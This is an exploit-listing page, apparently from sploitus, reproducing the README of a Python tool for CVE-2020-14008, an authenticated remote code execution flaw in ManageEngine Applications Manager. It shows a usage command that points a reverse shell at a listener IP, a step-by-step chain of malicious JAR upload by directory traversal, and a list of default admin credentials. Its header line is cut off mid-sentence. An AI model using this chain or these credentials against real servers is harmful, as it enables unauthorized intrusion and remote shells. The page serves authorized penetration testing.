Share
## https://sploitus.com/exploit?id=4CDB5924-4293-5936-9149-F66AA892132A
# CVE-2020-14008 - ManageEngine Applications Manager RCE
Authenticated Remote Code Execution via Arbitrary File Upload in Zoho ManageEngine Applications Manager (versions
```
### Examples
```bash
# Basic
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337
```
## Exploit Flow
1. **Login** - Authenticate with admin credentials, obtain session cookie
2. **Enumerate** - Retrieve the ManageEngine base installation directory
3. **Build JAR** - Compile a malicious Java class (`weblogic.jndi.Environment`) containing a reverse shell into `weblogic.jar`
4. **Upload** - Upload the JAR to `classes/weblogic/version8/` via directory traversal (fallback: create a scheduled task to move it)
5. **Trigger** - Invoke the Weblogic credential test at `/testCredential.do`, which loads and instantiates the malicious class
6. **Shell** - Reverse shell connects back to listener
## Default Credentials
| Username | Password |
|----------|----------|
| admin | admin |
| admin | password |
| administrator | administrator |
| guest | guest |
## Troubleshooting
| Error | Fix |
|-------|-----|
| `release version 7 not supported` | Java 21+ dropped Java 7 target. Script uses `--release 8` |
| `FileNotFoundError: weblogic.jar` | JAR compilation failed. Verify `javac` and `jar` are on PATH |
| `No valid response from used session` | Invalid credentials |
| `Actionname not found` | Task creation failed, check admin permissions |
## References
- [NVD - CVE-2020-14008](https://nvd.nist.gov/vuln/detail/CVE-2020-14008)
- [Exploit-DB #48793](https://www.exploit-db.com/exploits/48793)
- [ManageEngine Advisory](https://manageengine.co.uk/products/applications_manager/security-updates/security-updates-cve-2020-14008.html)
## Disclaimer
This tool is provided for authorized penetration testing and security research only. Unauthorized use against systems you do not own or have permission to test is illegal.